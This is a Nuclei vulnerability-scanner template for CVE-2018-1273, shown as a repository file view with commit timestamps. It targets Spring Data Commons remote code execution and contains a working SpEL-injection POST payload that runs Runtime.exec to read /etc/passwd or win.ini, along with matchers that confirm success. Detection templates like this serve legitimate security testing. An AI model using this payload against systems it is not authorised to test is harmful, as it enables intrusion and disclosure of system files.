nuclei-templates/cves/2018/CVE-2018-1273.yaml

44 lines
1.4 KiB
YAML
Raw Normal View History

2021-01-02 05:00:39 +00:00
id: CVE-2018-1273
2020-10-01 02:28:22 +00:00
info:
name: Spring Data Commons Unauthenticated RCE
author: dwisiswant0
severity: critical
description: |
Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5,
and older unsupported versions, contain a property binder vulnerability
caused by improper neutralization of special elements.
An unauthenticated remote malicious user (or attacker) can supply
specially crafted request parameters against Spring Data REST backed HTTP resources
or using Spring Datas projection-based request payload binding hat can lead to a remote code execution attack.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273
tags: cve,cve2018,vmware,rce
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2018-1273
cwe-id: CWE-20
2020-10-01 02:28:22 +00:00
requests:
- raw:
2020-10-01 02:28:22 +00:00
- |
POST /account HTTP/1.1
Host: {{Hostname}}
Connection: close
Content-Type: application/x-www-form-urlencoded
name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('§command§')}}')]=nuclei
payloads:
command:
- "cat /etc/passwd"
- "type C:\\/Windows\\/win.ini"
2020-10-01 02:28:22 +00:00
matchers:
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2020-10-01 02:28:22 +00:00
- "\\[(font|extension|file)s\\]"
condition: or
part: body